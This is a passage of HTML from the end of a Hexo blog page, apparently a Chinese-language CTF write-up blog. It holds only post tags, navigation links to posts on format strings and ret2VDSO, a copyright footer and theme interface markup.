              <a href="/tags/ctf/" rel="tag"># ctf</a>
              <a href="/tags/stack-overflow/" rel="tag"># stack-overflow</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/12/14/2025-12-14-week1-Format%20String/" rel="prev" title="CTF题解：Format String">
                  <i class="fa fa-angle-left"></i> CTF题解：Format String
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2026/01/30/2026-01-30-ret2VDSO%20%E6%8A%80%E6%9C%AF/" rel="next" title="学习笔记：ret2VDSO技术">
                  学习笔记：ret2VDSO技术 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder"></span>
  </div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
